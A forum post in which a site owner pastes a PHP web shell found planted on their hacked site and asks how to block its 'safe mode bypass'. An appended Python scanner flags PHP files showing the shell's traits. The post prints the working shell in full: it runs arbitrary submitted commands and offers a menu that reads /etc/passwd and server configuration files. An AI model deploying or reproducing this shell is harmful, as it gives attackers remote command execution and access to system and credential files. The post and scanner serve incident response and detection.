I got hacked and the following code was placed within my files:
Code:
<?
/*
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would I patch this? Like, is there any code I can add to a global file to prevent this "safemode bypass"?
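One way to find other files carrying the same shell, as an added example that is not part of the original post: a Python scanner that scores PHP files on the traits visible in the code above (the `ini_restore` calls, the fall-through over command functions, and request data fed into a call). The weights, threshold, file extensions and the two sample strings are assumptions constructed for illustration.

```python
import re
import sys
from pathlib import Path

CMD = r"(exec|shell_exec|system|passthru|popen|proc_open)"
# name -> (pattern, weight). Traits come from the posted shell; weights are assumed.
INDICATORS = {
    "ini_restore of safe_mode/open_basedir": (
        re.compile(r"""ini_restore\s*\(\s*['"](safe_mode|open_basedir)['"]""", re.I), 3),
    "command function called on a variable": (
        # The lookbehind skips $pdo->exec(), Foo::exec() and curl_exec().
        re.compile(r"(?<![\w>:$])" + CMD + r"\s*\(\s*\$", re.I), 2),
    "function_exists probe for a command function": (
        re.compile(r"""function_exists\s*\(\s*['"]""" + CMD + r"""['"]""", re.I), 2),
    "request data passed straight into a call": (
        re.compile(r"\w+\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.I), 2),
}
THRESHOLD = 4  # assumed cut-off: one trait alone is common in legitimate code

def score_source(text):
    """Return (score, matched indicator names) for one PHP source string."""
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(text)]
    return sum(INDICATORS[name][1] for name in hits), hits

def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Yield (path, score, hits) for each file under root at or above THRESHOLD."""
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in exts:
            text = path.read_text(encoding="utf-8", errors="replace")
            score, hits = score_source(text)
            if score >= THRESHOLD:
                yield path, score, hits

# Constructed samples: a fragment shaped like the posted shell, and a benign page.
SHELL_LIKE = """<? ini_restore("safe_mode");
if(function_exists('exec')) { @exec($komut,$res); }
if($_POST[baba]!= "") { $out=safeshell($_POST[baba]); } ?>"""
BENIGN = """<?php $name = htmlspecialchars($_POST["name"]); echo "Hello $name"; ?>"""

if __name__ == "__main__":
    for path, score, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{score:2d}  {path}  {'; '.join(hits)}")
```

Run it with the web root as the only argument; a listed file is a lead for manual review, not proof of compromise.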